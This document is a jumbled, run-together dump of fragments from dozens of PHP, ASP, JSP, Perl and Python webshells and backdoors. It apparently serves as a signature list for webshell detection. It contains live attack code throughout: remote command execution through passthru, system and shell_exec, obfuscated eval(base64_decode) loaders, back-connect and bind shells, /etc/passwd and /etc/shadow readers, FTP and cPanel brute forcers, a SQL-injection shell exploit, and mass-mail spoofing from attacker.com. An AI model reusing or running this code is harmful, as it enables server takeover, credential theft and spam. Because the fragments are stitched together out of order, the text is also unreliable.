shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 